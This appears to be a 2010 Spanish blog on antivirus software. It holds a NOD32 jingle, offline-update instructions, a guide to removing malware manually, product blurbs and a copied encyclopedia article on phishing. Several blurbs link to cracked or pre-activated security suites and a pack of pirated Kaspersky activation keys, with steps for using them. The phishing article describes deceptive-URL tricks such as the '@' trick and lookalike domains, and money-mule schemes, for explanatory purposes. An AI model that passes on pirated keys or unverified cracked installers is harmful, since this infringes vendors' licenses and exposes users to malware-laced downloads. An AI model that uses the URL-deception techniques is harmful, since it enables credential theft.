lunes, 26 de abril de 2010

The NOD song

Anytime you boot up your computer
Your door is open to some cowboy virus shooter
There ain’t no need to worry if you got it
'Coz Mr. IMON's gonna shout.... 'Let's NOD it!'

Chorus:
NOD — we protect your digital world
NOD32 — we protect you
NOD — we protect your digital world
NOD32 — we protect you

V.2
You open a file and AMON says 'wait!'
Ain't no need to get stressed or in a state
'Coz you know those worms ain't got no manners
NOD will smack 'em with it's on-demand scanner

Rpt. Chorus

miércoles, 21 de abril de 2010

Actualizacion Nod32 Offline

Aqui les dejo unas carpetas con actualizaciones del nod32 para que puedan actualizar su antivirus de manera off-line. Las mismas sirven la version 2.7 y la 3.x
Instrucciones:

Primero que nada descargan la carpeta correspondiente a su version y la descomprimen (recomiendo descomprimirla en C :\)

Luego hacen lo que corresponde a su version:

Version 2.7



1)Ir a modulos de actualizacion.
2)Ir a NOD32 Update.
3)Hacer click en servidores.
4)Hacer click en agregar.
5)Escribir la direccion donde descomprimieron la carpeta con las actualizaciones (ejemplo: c :\Update)
6)Dar click en aceptar en todas las ventanas.
7)Hacer click en actualizar y listo.

Version 3.x y 4.x



1)Ir a Setup.
2)Hacer click en la parte inferior derecha donde dice "enter entire advanced setup tree"
3)En la nueva ventana que aparece en la parte izquierda ir a "update".
4)Hacer click en "Edit".
5)Escribir la direccion donde descomprimieron la carpeta con las actualizaciones (ejemplo: c :\Update)
6)Hacer click en "Add"
7)Aceptar todos los cambios.
8)ir a update en el programa principal, darle actualizar y listo.

Actualizacion Constante en las carpetas correspondientes

A partir de ahora para que sea mas facil las actualizaciones se iran colocando en una carpeta de rapidshare la cual pueden visitar periodicamente ya que se iran subiendo todas las semanas nuevas actualizaciones ahi!

Carpeta Descargas para versiones 2.7

http://rapidshare.com/users/4GSVW1

Carpeta Descargas para versiones 3.x y 4.x

http://rapidshare.com/users/COF5ID


Instaladores Comerciales de Todas Las Ultimas Versiones de Eset (Español)



ESET Smart Security para Windows XP/2000/Vista 4.0.437 (32-bits)

http://rapidshare.com/files/272242936/ESET_Smart_Security_para_Windows_XP-2000-Vista_4.0.437___32-bits_.rar

ESET Smart Security para Windows XP/Vista 4.0.437 (64-bits)

http://rapidshare.com/files/272242937/ESET_Smart_Security_para_Windows_XP-Vista_4.0.437__64-bits_.rar

ESET NOD32 Antivirus para Windows XP/2000/Vista 4.0.437 (32-bits)

http://rapidshare.com/files/272242931/ESET_NOD32_Antivirus_para_Windows_XP-2000-Vista_4.0.437__32-bits_.rar
ESET NOD32 Antivirus para Windows XP/Vista 4.0.437 (64-bits)

http://rapidshare.com/files/272242933/ESET_NOD32_Antivirus_para_Windows_XP-Vista_4.0.437__64-bits_.rar

ESET NOD32 Antivirus para Windows NT 2.70.39

http://rapidshare.com/files/272242929/ESET_NOD32_Antivirus_para_Windows_NT_2.70.39.rar

ESET NOD32 Antivirus para Windows 95/98/ME 2.70.39
http://rapidshare.com/files/272242928/ESET_NOD32_Antivirus_para_Windows_95-98-ME_2.70.39.rar

viernes, 16 de abril de 2010

Eliminar virus

Eliminando virus manualmente

Hemos visto con anterioridad de dónde proceden los virus y los modos que tienes de resultar infectado. Aún teniendo todo el cuidado del mundo, siempre puede ocurrir que nuestro antivirus nos juegue una mala pasada al no reconocer una amenaza.
En casos así a veces uno debe remangarse, armarse de paciencia y tratar de arreglar el desaguisado por sí mismo. Obviamente, el primer paso para acabar con un virus es detectarlo y encontrarlo. Veremos cómo.

Sospechas de infección

Antes de nada tienes que tener razones de peso para saber si puedes tener algún virus en tu ordenador, especialmente si tienes un antivirus y éste no ha dicho nada.
Un síntoma muy fácil de reconocer es la aparición de ventanas emergentes con publicidad, así como que se te carguen páginas distintas a las que estás intentando ver. Técnicamente esto no sería un virus sino adware / malware, pero para simplificar trataremos todos estos términos por igual.
La navegación por Internet excesivamente lenta puede ser también un síntoma, aunque no tan claro como el anterior ya que es causado por otros motivos también. En cualquier caso, si notas que tu conexión actúa como si la estuvieras usando más de lo que realmente la usas, no te vendrá mal sospechar.
Una lectura excesiva del disco duro sin razón es otro motivo para sospechar, ya que algunos virus se extienden por el disco duro buscando archivos que infectar.
Por último, pero no por ello menos importante, si tus amigos te avisan de que les estás enviando mensajes por correo electrónico o mensajería instantánea que tú no has enviado, es seguro que estás infectado.

Procesos

Tras la sospecha inicial, tienes que asegurarte de que algo no anda bien en tu Windows. Tienes varios modos de comprobarlo. Lo primero es analizar los procesos activos.
Desde Windows, iniciando el Administrador de Tareas (Control+Alt+Supr o clic derecho en la Barra de tareas) puedes consultar, en la pestaña Procesos, todo lo que está cargado en ese momento.
La idea es buscar procesos que no deberían estar ahí. El problema es que la mayoría de las veces no sabrás si un proceso es normal de Windows o no, aunque siempre puedes buscar más información en Google o páginas especializadas como ProcessLibrary.
Si lo prefieres, tienes a tu disposición todo un arsenal de aplicaciones con las cuales analizar los procesos en ejecución. Por ejemplo Process Explorer, avalado por Microsoft, Security Process Explorer, que muestra de forma visual la fiabilidad de cada proceso, o System Explorer, un auténtico todo-en-uno que te será de gran utilidad en el análisis y eliminación de virus.

Conexiones activas

Si no has conseguido sacar en claro nada de lo anterior, las conexiones activas en el ordenador son a veces un claro indicativo de que algún tipo de malware se encuentra activo.
Para obtener una lista de las conexiones activas -o que estuvieron activas poco tiempo atrás- tienes que abrir una ventana de comandos (Inicio / Ejecutar / cmd.exe) y escribir “netstat”. Aparecerá una ventana como la siguiente.
Al igual que ocurría con los procesos del Administrador de tareas, la dificultad mayor está en interpretar los datos. Para nuestro fin debemos obviar las conexiones locales (localhost o el nombre del equipo) y aquellas que están casuadas por programas que conocemos.
Por ejemplo, pueden ser la publicidad incluida en la ventana de Messenger o Firefox buscando actualizaciones para sus extensiones. Para minimizar el “ruido” es mejor cerrar todas las aplicaciones posibles antes de ejecutar “netstat”, especialmente los programas P2P.
Algunos malware se pueden reconocer porque realizan una buena cantidad de conexiones al intentar expandirse por Internet o actuar como “zombies”.

Autoarranque de Windows

El arranque automático de Windows es una de las paradas obligadas para casi todos los virus y malware. Comprobar qué se está iniciando con Windows es muy sencillo. Sin necesidad de ninguna herramienta adicional, lo puedes hacer desde el Menú Inicio / Ejecutar / msconfig.
Sigue siendo difícil para un usuario novato distinguir entre los elementos normales y los que no lo son. Una vez más, Google sale al rescate, así como ProcessLibrary, que ya comentamos antes.
A veces, sin embargo, es realmente fácil encontrar el malware ya que no se camufla demasiado bien y, para evitar ser reconocido por los antivirus, utiliza nombres autogenerados como aebdfcehu.exe, bueghefa.exe, abdubfgb.exe…
Pero, como no siempre será tan obvio, hay toneladas de aplicaciones diseñadas para analizar el arranque de Windows. Por ejemplo, Autoruns, que es realmente completa, tanto que llega a abrumar un poco. System Explorer, del que ya hemos hablado y Startup Optimizer, que te muestra visualmente la utilidad o no de cada elemento, son otras opciones a tu disposición.
Y hasta aquí esta primera parte de la serie sobre eliminar virus manualmente. En la siguiente entrega dejaremos de lado el diagnóstico y nos volcaremos de lleno en la tarea de sacar a estos molestos inquilinos de nuestros ordenadores.


En la primera parte de esta serie de artículos vimos una serie de pautas que pueden indicar si tu equipo está infectado por un código malicioso que tu antivirus ha sido incapaz de detectar. Por supuesto, eso no era más que el principio.

El siguiente paso consiste en encontrar la amenaza y erradicarla de tal modo que no vuelva a ser un problema. A continuación veremos algunas recomendaciones para hacerlo con la mayor seguridad posible.
1. Encontrar el archivo infectado

Un buen punto de partida es encontrar un archivo que esté inequívocamente infectado. En la entrega anterior ya vimos cómo buscar en el autoarranque de Windows o en los procesos activos. La idea es obtener algo de información sobre la que empezar a trabajar.

Una forma de conseguirlo es subiendo ese archivo infectado a una página que analiza la muestra con muchos antivirus. De este modo no sólo podremos obtener el nombre del virus que se ha instalado en nuestro equipo, sino que además sabremos qué antivirus son capaces de detectarlo.
2a. Eliminación por las buenas

Ahora que sabemos cómo se llama y quién es capaz de acabar con él, ¿por qué no utilizar esta información a nuestro favor? La mayoría de los programas antivirus disponen de una versión de prueba gratuita. Por tanto, no resulta mala idea descargar el antivirus capaz de detectar y eliminar la amenaza que te aqueja.

Si no has tenido suerte con el método anterior y ninguno de los antivirus te convence, siempre puedes utilizar vacunas específicas, si es que existen. En Softonic puedes encontrar unas cuantas en la categoría correspondiente. También encontrarás un buen número de ellas en las páginas de Symantec y BitDefender, por nombrar algunas.
2b. Eliminación manual

Si lo anterior falla… tendrás que ensuciarte las manos tú mismo. El objetivo principal es borrar el archivo infectado, pero esto no siempre es posible. Generalmente se encuentran protegidos para que no puedas borrarlos, u otro proceso se encarga de regenerarlo después de cada arranque.

Para esos archivos que se resisten a ser borrados puedes utilizar Unlocker (ya hablamos de él hace un tiempo), un programa especializado en esta tarea. Desgraciadamente hay ocasiones en las que la eliminación no tendrá éxito, pero no desesperes, aún hay algo que puedes hacer.

El modo seguro de Windows inicia el sistema con muchos menos componentes, y eso incluye -a veces- ese escurridizo archivo que estás intentando borrar. ¿Tampoco da resultado? Bueno, en tal caso vas a necesitar artillería pesada. ¿Tienes otro sistema operativo instalado en el ordenador? Desde él lo podrás borrar. Si no, siempre te queda la opción de utilizar la Consola de Recuperación del sistema, un LiveCD o incluso una llave USB de una distribución de Linux que pueda leer y escribir NTFS.
3. Quitar del arranque

Si has eliminado el archivo correcto, es probable que la próxima vez que arranques Windows te aparezca una ventana de error indicando un fallo al tratar de cargar un archivo que no existe. Es una buena señal, pues indica que has dado en el clavo. Te faltaría eliminar las entradas del arranque que le mencionan para terminar la limpieza.

Sin embargo, sucede con frecuencia que el archivo que has borrado está efectivamente borrado… pero otro ocupa su lugar. Esto es así porque el virus se ha “dado cuenta” de que has borrado uno de sus archivos y lo ha regenerado. De igual modo, también puede detectar cuándo le has eliminado del arranque y reinstalarse en el mismo.

La teoría es la siguiente: el arranque inicia un ejecutable que por tanto se convierte en un proceso activo que monitoriza el arranque y los archivos. Si lo quitas del arranque, vuelve a ponerse por sí solo. Si borras el archivo, se restaura. Muchas veces, además, Windows no te deja cerrar el proceso desde el Administrador de Tareas.

En tal caso, has eliminado el archivo incorrecto. Como si de una cacería de vampiros se tratara, tienes que acabar con el vampiro jefe primero, y todos los demás caerán. O, dejando la terminología mística, debes eliminar el archivo que está monitorizando y regenerando los virus.

Para ello deberás volver al paso 1 y encontrar el archivo principal del virus con la ayuda de utilidades como System Explorer, Sysinternals Suite o las utilidades NirSoft. Después, vuelve al paso 2 y prosigue desde allí.
Conclusiones

Eliminar virus, troyanos y otras cosas indeseables de forma manual es una tarea ardua y que no está al alcance de cualquiera, pero tiene sus recompensas. Por ejemplo, la mayoría de las veces el sistema quedará intacto, con lo cual te ahorras las molestias de formatear y reinstalar el sistema. Además, en algunas ocasiones resulta más rápido que esperar a que un antivirus termine de escanear todos tus archivos.

En cualquier caso, con paciencia, algo de sentido común y teniendo siempre en mente que un virus no es más que un programa informático más, los resultados suelen ser positivos. Esperamos que estas indicaciones generales os sirvan para paliar las molestias causadas por estos indeseables invitados.

Visto en:on software
Leer más...

Fuente: http://pcfull2008.blogspot.com/2009/03/eliminando-virus-manualmente.html

Ad-Aware

 

Descripción: El malware y los programas espía han ido reemplazando a los virus como amenaza informática principal. El uso de un programa anti-spyware eficaz - como Ad-Aware - es una necesidad que no puede ser ignorada.
Ad-Aware es un clásico de la protección anti-espía, capaz de detectar cualquier tipo de spyware, adware, troyanos y otros complementos que toman el control del navegador sin permiso o vulneran tu privacidad.

Desde la nueva pantalla principal de Ad-Aware resulta muy rápido acceder a las actualizaciones gratuitas y al análisis bajo demanda. El nuevo Ad-Aware ha sido optimizado de manera que gaste menos recursos y analice más ficheros por segundo.

Antes de proceder a la limpieza, Ad-Aware puede establecer un punto de restauración del sistema. La cuarentena y la lista de ficheros ignorados te permitirá un mayor control del proceso. Al mismo tiempo, Ad-Aware presenta protección en tiempo real mediante Ad-Watch Live!, capaz de bloquear procesos dañinos antes que se inicien.

Con un rendimiento muy mejorado, el regreso de características valiosas y un consumo mínimo de recursos, Ad-Aware sigue siendo un excelente programa anti-espía.

DESCARGAR

Panda Cloud Antivirus

El antivirus ligero que no requiere actualizaciones

Panda Cloud Antivirus emplea una filosofía de protección distinta. Su capacidad para detectar y eliminar virus, troyanos, spyware y otros peligros se basa exclusivamente en la tecnología de Inteligencia Colectiva, una red de servidores que facilita la recolección de muestras y el despliegue de firmas.
Tras la instalación, lo primero que notarás de Panda Cloud Antivirus es la sencillez de su interfaz. El panel principal muestra un icono que resume la situación de seguridad. Tres grandes botones dan acceso a los análisis bajo demanda, al informe de sucesos y a las pocas opciones disponibles. Si pulsas el pequeño icono de la esquina inferior derecha, Panda Cloud Antivirus te mostrará los ficheros en cuarentena.

Una peculiaridad de Panda Cloud Antivirus es que no requiere actualizaciones: cada vez que analiza un fichero, se conecta a la red de servidores de Panda para comprobar sobre la marcha si coincide con las firmas disponibles. La ventaja de este modelo es que Panda Cloud Antivirus puede detectar nuevos peligros y enviar muestras de malware en tiempos muy reducidos. Por otro lado, necesitarás estar siempre conectado a la red.

El consumo de memoria de Panda Cloud Antivirus, alrededor de cincuenta megabytes, no es tan bajo como se pudiera esperar, pero los análisis son rápidos y discretos. Si algo puede achacarse a Panda Cloud Antivirus es la excesiva simpleza de su aspecto y la poca información que proporciona. Algo que, por otro lado, puede gustar a muchos usuarios.



Cambios recientes en Panda Cloud Antivirus:
La versión preactivada no necesita de la creación de una cuenta durante la instalación
Correcciones
Se mejora la detección heurística basada en la nube para malware desconocido
Se mejora la prevalencia de algoritmos para la priorización de nuevo malware
Se mejora la detección heurística basada en la nube
Para utilizar Panda Cloud Antivirus necesitas:
Sistema operativo: WinXP/Vista/7

DESCARGA
http://freakshare.net/files/6616v1fm/AP10.exe.html

Antivirus Avast





Descripción: avast! es uno de los nombres clásicos de la seguridad informática. Más de cien millones de usuarios en todo el mundo confían en la solidez de este antivirus.
La nueva versión de avast! abandona el viejo panel metálico para dejar sitio a una ventana similar a la de los antivirus más conocidos, una interfaz en la que abundan los tonos grises y naranja. Mucho más elegante que antaño, avast! goza ahora de una mejor organización de los menús.

avast! 5 ha cambiado su motor añadiendo funciones muy interesantes. No sólo se mantienen los módulos de protección P2P, web y de mensajería, sino que se añade uno nuevo, el Behavior Shield (o escudo conductual), que controla comportamientos sospechosos por parte de cualquier programa.

Las estadísticas de análisis son muy detalladas y fáciles de consultar, y las opciones permiten modificar cualquier parámetro de avast!. Puedes activar efectos gráficos especiales, habilitar el modo silencioso (o de juego) para evitar que las notificaciones te molesten e incluso retrasar la carga del servicio de avast! en memoria.

avast! 5 es, en muchos sentidos, el mejor antivirus gratuito. El que había sido el punto débil tradicional de avast! -su escasa usabilidad- ha sido resuelto de manera brillante. Y el motor de detección es uno de los mejores en circulación. ¿A qué esperas para proteger tu equipo?

DESCARGAR

Norton AntiVirus Full 2010




Eficaz, rápido, ligero. Son los tres adjetivos que definen Norton AntiVirus 2010, el principal programa de seguridad de Symantec.


Ha servido un año, pero la espera ha valido la pena: Norton AntiVirus 2010 se parece poco a su predecesor. La velocidad se aprecia desde la instalación, rauda como el rayo. El consumo de memoria se ha reducido, una buena noticia para quienes usan equipos modestos.


El sistema de información Insight es el punto fuerte de Norton AntiVirus 2010. En todo momento puedes conocer el estado del equipo, la peligrosidad de un fichero o la carga del sistema.


Cada minuto, Norton AntiVirus 2010 actualiza su base de datos de forma silenciosa para que siempre estés al tanto de las amenazas que recorren la red. El motor heurístico SONAR detecta el malware desconocido con una eficacia sorprendente, mientras que el sistema de prevención de intrusiones evita la propagación de troyanos y spyware.


Hay muy pocos motivos para quejarse de Norton AntiVirus 2010. Sus mejoras espectaculares le hacen merecedor de una posición destacada. Eso sí, cuando necesites un control más detallado de la seguridad, es posible que Norton AntiVirus 2010 no te satisfaga del todo.
Cambios recientes en Norton AntiVirus:


* Diagnóstico Norton mejorado
* Compatible con Windows 7
* Consume menos recursos
* Mejor rendimiento


Para utilizar Norton AntiVirus necesitas:


* Sistema operativo: WinXP/Vista/7 Compatible con Windows 7


Requisitos mínimos:


* Procesador: 300 MHz
* Memoria: 256 MB
* Espacio libre en disco: 200 MB


Idioma: Español, ingles, aleman, frances, italiano y holandes.





No password.

Panda antivirus Pro 2010 activado. Compatible windows 7





Panda Antivirus detecta y elimina automáticamente todo tipo de virus, gusanos y troyanos, incluso los más novedosos y que usan las técnicas más avanzadas de ocultación, manteniendo limpio tu PC y permitiéndote navegar por Internet, enviar y recibir correos, jugar, descargar archivos, chatear y lo que quieras, sin miedo a virus.





Panda Antivirus también localiza y elimina todo tipo de spyware y otros molestos programas que se instalan sin tu permiso en el ordenador, mientras protege tu conexión mediante un completo y poco intrusivo cortafuegos y mantiene tus datos personales a buen recaudo de estafas por Internet.

Cambios recientes en Panda Antivirus:

Panda USB Vaccine
Menor uso de memoria
Mejorado el análisis en tiempo real y bajo demanda
Mejorado el análisis de tráfico de red
Nuevas tecnologías de protección proactiva
Mejorado el motor heurístico

Para utilizar Panda Antivirus necesitas:

Sistema operativo: WinXP/Vista/7



Requisitos mínimos:

Procesador: 300 MHz
Memoria: 128 MB
Espacio libre en disco: 265 MB

Requisitos recomendados:

Memoria: 1 GB recomendado

Datos de la descarga:

Tamaño del archivo: 50 MB comprimido con Winrar
Idioma: Español
Incluye serial para activarlo


link

http://depositfiles.com/files/trpemouli

Kaspersky keys

Kaspersky keys ALL KIS/KAV 2010 (16.04.2010)


Kaspersky keys ALL KIS/KAV 2010 (16.04.2010) | 6Mb
Kaspersky Activation Keys for Kaspersky Internet Secutiry and Kaspersky Antivirus NEW KEYS .

How To Use/Guide:

1)Install "Kaspersky Internet Security 2009, for example"
2)Choose A Key From KIS_7,KIS_8,KIS_9,KAV_7,KAV_8,KAV_9(Choose KIS_8 for Kaspersky Internet Security 2009, for example).
3)Copy The Key And Paste It On Your Desktop (Or Where Ever You Want)
4)Open Kaspersky And Click: License > Merge/delete > "Delete Key" [If You Already
Have A Key Installed] > Activate Using The Key File > Browse [Browse For Your
Key - If You Followed These Instructions It Should Be Located On Your Desktop]
Activate!
5)Enjoy!

Download
http://hotfile.com/dl/38199242/15a9616/Kaspersky_keys_16_April_2010__.rar.html

Comodo Internet Security






Plataformas: WinXP/Vista/7.

Descripción:

Comodo Internet Security une en la misma aplicación la potencia y seguridad de Comodo Firewall y Comodo AntiVirus, añadiendo nuevas funcionalidades como protección de archivos del sistema y de entradas del Registro de Windows.

Una vez instalado, Comodo Internet Security aprenderá qué programas son fiables y cuáles no y se encargará de proteger nuestro PC, avisando si intentan acceder al ordenador, si tenemos un virus o si algún programa intenta editar un archivo o clave del registro sin autorización.

Comodo Internet Security permanece alerta constantemente en la bandeja de sistema, aunque podemos realizar un escaneo manual en busca de virus o cualquier tipo de malware y añadir manualmente puertos y conexiones al cortafuegos, así como proteger archivos y carpetas de posibles accesos no autorizados.


DESCARGA

http://sharingmatrix.com/file/1007518/Comodo_Internet_Security_3.13.125662.rar

jueves, 15 de abril de 2010

Phishing

Artículo bueno Wikipedia:Artículos buenos

Éste es un ejemplo de un intento de phishing. Haciéndose pasar por un email oficial, trata de engañar a los clientes del banco para que den información acerca de su cuenta con un enlace a la página del fhisher.
Phishing es un termino informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas cibernéticas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea o incluso utilizando también llamadas telefónicas.[2]
Dado el creciente número de denuncias de incidentes relacionados con el phishing, se requieren métodos adicionales de protección. Se han realizado intentos con leyes que castigan la práctica y campañas para prevenir a los usuarios con la aplicación de medidas técnicas a los programas.


Historia del phishing

Origen de la palabra

El término phishing proviene de la palabra inglesa "fishing" (pesca), haciendo alusión al intento de hacer que los usuarios "piquen en el anzuelo". A quien lo practica se le llama phisher. También se dice que el término "phishing" es la contracción de "password harvesting fishing" (cosecha y pesca de contraseñas), aunque esto probablemente es un acrónimo retroactivo, dado que la escritura 'ph es comúnmente utilizada por hackers para sustituir la f, como raíz de la antigua forma de hacking telefónico conocida como phreaking.
La primera mención del término phishing data de enero de 1996. Se dio en el grupo de noticias de hackers alt.2600, aunque es posible que el término ya hubiera aparecido anteriormente en la edición impresa del boletín de noticias hacker "2600 Magazine". El término phishing fue adoptado por quienes intentaban "pescar" cuentas de miembros de AOL.

Phishing en AOL

Quienes comenzaron a hacer phishing en AOL durante los años 1990 solían obtener cuentas para usar los servicios de esa compañía a través de números de tarjetas de crédito válidos, generados utilizando algoritmos para tal efecto. Estas cuentas de acceso a AOL podían durar semanas e incluso meses. En 1995 AOL tomó medidas para prevenir este uso fraudulento de sus servicios, de modo que los crackers recurrieron al phishing para obtener cuentas legítimas en AOL.
El phishing en AOL estaba estrechamente relacionado con la comunidad de warez que intercambiaba software falsificado. Un cracker se hacía pasar como un empleado de AOL y enviaba un mensaje instantáneo a una víctima potencial. Para poder engañar a la víctima de modo que diera información confidencial, el mensaje podía contener textos como "verificando cuenta" o "confirmando información de factura". Una vez el usuario enviaba su contraseña, el atacante podía tener acceso a la cuenta de la víctima y utilizarla para varios propósitos criminales, incluyendo el spam. Tanto el phishing como el warezing en AOL requerían generalmente el uso de programas escritos por crackers, como el AOLHell.
En 1997 AOL reforzó su política respecto al phishing y los warez fueron terminantemente expulsados de los servidores de AOL. Durante ese tiempo el phishing era tan frecuente en AOL que decidieron añadir en su sistema de mensajería instantánea, una línea de texto que indicaba: "no one working at AOL will ask for your password or billing information" ("nadie que trabaje en AOL le pedirá a usted su contraseña o información de facturación"). Simultáneamente AOL desarrolló un sistema que desactivaba de forma automática una cuenta involucrada en phishing, normalmente antes de que la víctima pudiera responder. Los phishers se trasladaron de forma temporal al sistema de mensajería instantáneo de AOL (AIM), debido a que no podían ser expulsados del servidor de AIM. El cierre obligado de la escena de warez en AOL causó que muchos phishers dejaran el servicio, y en consecuencia la práctica.

Phishing en MSN Messenger

Dos de los ejemplos más recientes son las páginas quienteadmite y noadmitido destinadas a robar el nombre y contraseña de los usuarios de MSN a cambio de mostrarle a los visitantes que las utilicen, quien los ha borrado de su lista de contactos. Esta tecnica consiste en pedirle al usuario final su usuario o correo electronico y luego la contraseña, datos que son enviados luego a la base de datos de el autor de la pagina, y asi almacenando la informacion para poder acceder a dichas cuentas.

Intentos recientes de phishing

Los intentos más recientes de phishing han tomado como objetivo a clientes de bancos y servicios de pago en línea. Aunque el ejemplo que se muestra en la primera imagen es enviado por phishers de forma indiscriminada con la esperanza de encontrar a un cliente de dicho banco o servicio, estudios recientes muestran que los phishers en un principio son capaces de establecer con qué banco una posible víctima tiene relación, y de ese modo enviar un e-mail, falseado apropiadamente, a la posible víctima. En términos generales, esta variante hacia objetivos específicos en el phishing se ha denominado spear phishing (literalmente pesca con arpón). Los sitios de Internet con fines sociales también se han convertido en objetivos para los phishers, dado que mucha de la información provista en estos sitios puede ser utilizada en el robo de identidad. Algunos experimentos han otorgado una tasa de éxito de un 90% en ataques phishing en redes sociales. A finales de 2006 un gusano informático se apropió de algunas páginas del sitio web MySpace logrando redireccionar los enlaces de modo que apuntaran a una página web diseñada para robar información de ingreso de los usuarios.

Técnicas de phishing

La mayoría de los métodos de phishing utilizan alguna forma técnica de engaño en el diseño para mostrar que un enlace en un correo electrónico parezca una copia de la organización por la cual se hace pasar el impostor. URLs mal escritas o el uso de subdominios son trucos comúnmente usados por phishers, como el ejemplo en esta URL, http://www.nombredetubanco.com.ejemplo.com/. Otro ejemplo para disfrazar enlaces es el de utilizar direcciones que contengan el carácter arroba: @, para posteriormente preguntar el nombre de usuario y contraseña (contrario a los estándares). Por ejemplo, el enlace http://www.google.com@members.tripod.com/ puede engañar a un observador casual y hacerlo creer que el enlace va a abrir en la página de www.google.com, cuando realmente el enlace envía al navegador a la página de members.tripod.com (y al intentar entrar con el nombre de usuario de www.google.com, si no existe tal usuario, la página abrirá normalmente). Este método ha sido erradicado desde entonces en los navegadores de Mozilla e Internet Explorer. Otros intentos de phishing utilizan comandos en JavaScripts para alterar la barra de direcciones. Esto se hace poniendo una imagen de la URL de la entidad legítima sobre la barra de direcciones, o cerrando la barra de direcciones original y abriendo una nueva que contiene la URL ilegítima.
En otro método popular de phishing, el atacante utiliza contra la víctima el propio código de programa del banco o servicio por el cual se hace pasar. Este tipo de ataque resulta particularmente problemático, ya que dirige al usuario a iniciar sesión en la propia página del banco o servicio, donde la URL y los certificados de seguridad parecen correctos. En este método de ataque (conocido como Cross Site Scripting) los usuarios reciben un mensaje diciendo que tienen que "verificar" sus cuentas, seguido por un enlace que parece la página web auténtica; en realidad, el enlace está modificado para realizar este ataque, además es muy difícil de detectar si no se tienen los conocimientos necesarios.
Otro problema con las URL es el relacionado con el manejo de Nombre de dominio internacionalizado (IDN) en los navegadores, puesto que puede ser que direcciones que resulten idénticas a la vista puedan conducir a diferentes sitios (por ejemplo dominio.com se ve similar a dοminiο.com, aunque en el segundo las letras "o" hayan sido reemplazadas por la correspondiente letra griega ómicron, "ο"). Al usar esta técnica es posible dirigir a los usuarios a páginas web con malas intenciones. A pesar de la publicidad que se ha dado acerca de este defecto, conocido como IDN spoofing o ataques homógrafos, ningún ataque conocido de phishing lo ha utilizado.

Lavado de dinero producto del phishing

Actualmente empresas ficticias intentan reclutar teletrabajadores por medio de e-mails, chats, irc y otros medios, ofreciéndoles no sólo trabajar desde casa sino también otros jugosos beneficios. Aquellas personas que aceptan la oferta se convierten automáticamente en víctimas que incurren en un grave delito sin saberlo: el blanqueo de dinero obtenido a través del acto fraudulento de phishing.
Para que una persona pueda darse de alta con esta clase de empresas debe rellenar un formulario en el cual indicará, entre otros datos, su número de cuenta bancaria. Esto tiene la finalidad de ingresar en la cuenta del trabajador-víctima el dinero procedente de estafas bancarias realizadas por el método de phishing. Una vez contratada, la víctima se convierte automáticamente en lo que se conoce vulgarmente como mulero.
Con cada acto fraudulento de phishing la víctima recibe el cuantioso ingreso en su cuenta bancaria y la empresa le notifica del hecho. Una vez recibido este ingreso, la víctima se quedará un porcentaje del dinero total, pudiendo rondar el 10%-20%, como comisión de trabajo y el resto lo reenviará a través de sistemas de envío de dinero a cuentas indicadas por la seudo-empresa.
Dado el desconocimiento de la víctima (muchas veces motivado por la necesidad económica) ésta se ve involucrada en un acto de estafa importante, pudiendo ser requerido por la justicia previa denuncia de los bancos. Estas denuncias se suelen resolver con la imposición de devolver todo el dinero sustraído a la víctima, obviando que este únicamente recibió una comisión.

Fases

  • En la primera fase, la red de estafadores se nutre de usuarios de chat, foros o correos electrónicos, a través de mensajes de ofertas de empleo con una gran rentabilidad o disposición de dinero (hoax o scam). En el caso de que caigan en la trampa, los presuntos intermediarios de la estafa, deben rellenar determinados campos, tales como: Datos personales y número de cuenta bancaria.
  • Se comete el phishing, ya sea el envío global de millones de correos electrónicos bajo la apariencia de entidades bancarias, solicitando las claves de la cuenta bancaria (PHISHING) o con ataques específicos.
  • El tercer paso consiste en que los estafadores comienzan a retirar sumas importantes de dinero, las cuales son transmitidas a las cuentas de los intermediarios (muleros).
  • Los intermediarios realizan el traspaso a las cuentas de los estafadores, llevándose éstos las cantidades de dinero y aquéllos —los intermediarios— el porcentaje de la comisión.

Daños causados por el phishing


Una gráfica muestra el incremento en los reportes de phishing desde octubre de 2004 hasta junio de 2005.
Los daños causados por el phishing oscilan entre la pérdida del acceso al correo electrónico a pérdidas económicas sustanciales. Este tipo de robo de identidad se está haciendo cada vez más popular por la facilidad con que personas confiadas normalmente revelan información personal a los phishers, incluyendo números de tarjetas de crédito y números de seguridad social. Una vez esta información es adquirida, los phishers pueden usar datos personales para crear cuentas falsas utilizando el nombre de la víctima, gastar el crédito de la víctima, o incluso impedir a las víctimas acceder a sus propias cuentas.
Se estima que entre mayo de 2004 y mayo de 2005, aproximadamente 1,2 millones de usuarios de computadoras en los Estados Unidos tuvieron pérdidas a causa del phishing, lo que suma a aproximadamente $929 millones de dólares estadounidenses. Los negocios en los Estados Unidos perdieron cerca de 2000 millones de dólares al año mientras sus clientes eran víctimas. El Reino Unido también sufrió el alto incremento en la práctica del phishing. En marzo del 2005, la cantidad de dinero reportado que perdió el Reino Unido a causa de esta práctica fue de aproximadamente £12 millones de libras esterlinas.

Anti-Phishing

Existen varias técnicas diferentes para combatir el phishing, incluyendo la legislación y la creación de tecnologías específicas que tienen como objetivo evitarlo.

Respuesta social

Una estrategia para combatir el phishing adoptada por algunas empresas es la de entrenar a los empleados de modo que puedan reconocer posibles ataques phishing. Una nueva táctica de phishing donde se envían correos electrónicos de tipo phishing a una compañía determinada, conocido como spear phishing, ha motivado al entrenamiento de usuarios en varias localidades, incluyendo la Academia Militar de West Point en los Estados Unidos. En un experimento realizado en junio del 2004 con spear phishing, el 80% de los 500 cadetes de West Point a los que se les envió un e-mail falso fueron engañados y procedieron a dar información personal.
Un usuario al que se le contacta mediante un mensaje electrónico y se le hace mención sobre la necesidad de "verificar" una cuenta electrónica puede o bien contactar con la compañía que supuestamente le envía el mensaje, o puede escribir la dirección web de un sitio web seguro en la barra de direcciones de su navegador para evitar usar el enlace que aparece en el mensaje sospechoso de phishing. Muchas compañías, incluyendo eBay y PayPal, siempre se dirigen a sus clientes por su nombre de usuario en los correos electrónicos, de manera que si un correo electrónico se dirige al usuario de una manera genérica como ("Querido miembro de eBay") es probable que se trate de un intento de phishing.

Respuestas técnicas


Alerta del navegador Firefox antes de acceder a páginas sospechosas de phishing.
